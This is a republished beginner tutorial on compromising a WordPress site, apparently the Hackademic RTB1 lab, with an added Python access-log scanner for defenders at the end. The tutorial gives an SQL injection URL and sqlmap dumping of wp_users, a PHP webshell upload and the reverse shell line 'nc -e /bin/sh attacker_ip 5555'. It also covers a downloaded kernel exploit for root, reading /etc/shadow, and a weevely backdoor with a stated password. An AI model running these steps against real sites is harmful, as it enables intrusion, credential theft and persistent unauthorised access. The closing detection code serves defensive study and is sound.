
Step‑by‑Step WordPress Site Penetration Testing Tutorial

This tutorial walks beginners through the entire process of compromising a WordPress website, from initial information gathering and DNS enumeration to vulnerability scanning, exploitation with tools like sqlmap and nmap, privilege escalation, and establishing persistent backdoors.

Java Architect Essentials

This article provides a comprehensive, beginner‑friendly walkthrough of hacking a WordPress site, covering information gathering, DNS lookup, server fingerprinting, vulnerability scanning, exploitation, and post‑exploitation.

1. Information gathering – Use ping to obtain the target IP (e.g., 173.236.138.113) and services like who.is to retrieve DNS records (A, NS, MX, etc.).

2. Server identification – Determine the web server type (Apache) and version, as well as the operating system (Fedora Linux), using whatweb from BackTrack 5.

3. Port scanning – Run nmap to discover open ports; only port 80 is open on the target.

4. Vulnerability scanning – Use nikto and w3af to enumerate common web vulnerabilities (SQL injection, XSS, LFI, etc.).

5. Exploiting SQL injection – Identify a vulnerable URL (e.g., http://hack-test.com/Hackademic_RTB1/?cat=d%27z%2220) and run sqlmap -u to enumerate databases, tables, and dump credentials from the wp_users table.

Sample command output:

id
uid=48(apache) gid=489(apache) groups=489(apache)

After retrieving password hashes, the article suggests using online hash‑cracking services.

6. Gaining remote shell – Upload a PHP webshell via the Textile plugin, then use nc to reverse‑connect to the attacker’s machine (listening on port 5555).

Example reverse‑shell command executed on the compromised host:

nc -e /bin/sh attacker_ip 5555

7. Privilege escalation – Search Exploit‑DB for a kernel exploit matching the server’s kernel version (2.6.31.5‑127.fc12). Download the exploit (e.g., http://www.exploit-db.com/exploits/15285), compile it, and execute to obtain root privileges.

Compilation command:

gcc roro.c -o roro

Running the compiled exploit:

./roro

After escalation, the article shows reading /etc/shadow and suggests creating a persistent PHP backdoor with weevely (password “koko”).

Generating the backdoor:

./main.py -g -o hax.php -p koko

Deploying and using the backdoor:

./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko

The tutorial concludes with a reminder that the attacker now has full root access and can explore further post‑exploitation techniques.
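
Seen from the defending side, the malformed cat parameter in step 5 and the hax.php backdoor dropped into the plugins directory both leave entries in the web server's access log. The following is an added example, not code from the original article: a Python scan of Apache combined-format log lines that flags those traces. The log lines, client IPs and the list of stock plugin files are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# WordPress category IDs are integers, optionally negated or comma-separated.
CAT_OK = re.compile(r'-?\d+(,-?\d+)*')
# A PHP file sitting directly in plugins/ rather than inside a plugin's own folder.
LOOSE_PLUGIN_PHP = re.compile(r'/wp-content/plugins/(?P<file>[^/]+\.php)$', re.I)
STOCK_FILES = {"index.php", "hello.php"}  # assumed present on a stock install

def classify(line):
    """Return the findings for one access-log line (empty list if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    url = urlsplit(m["target"])
    # parse_qs percent-decodes values, so %27 is a quote by the time it is checked.
    cats = parse_qs(url.query, keep_blank_values=True).get("cat", [])
    if any(not CAT_OK.fullmatch(v) for v in cats):
        findings.append("non-numeric cat parameter")
    if "sqlmap" in m["ua"].lower():
        findings.append("sqlmap user-agent")
    loose = LOOSE_PLUGIN_PHP.search(url.path)
    if loose and loose["file"].lower() not in STOCK_FILES:
        findings.append("loose PHP file in plugins directory")
    return findings

def scan(lines):
    """Return (line index, findings) for every line with at least one finding."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]

# Constructed sample lines; 203.0.113.0/24 is a documentation address range.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /Hackademic_RTB1/?cat=d%27z%2220 HTTP/1.1" 200 4211 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:57:10 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0 (constructed)"',
    '203.0.113.9 - - [10/Oct/2023:14:20:41 +0000] "POST /Hackademic_RTB1/wp-content/plugins/hax.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:14:21:00 +0000] "GET /Hackademic_RTB1/wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG):
        print(idx, findings)
```

The User-Agent check only catches a scanner left on its default header, so the parameter and file-path checks carry most of the weight.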
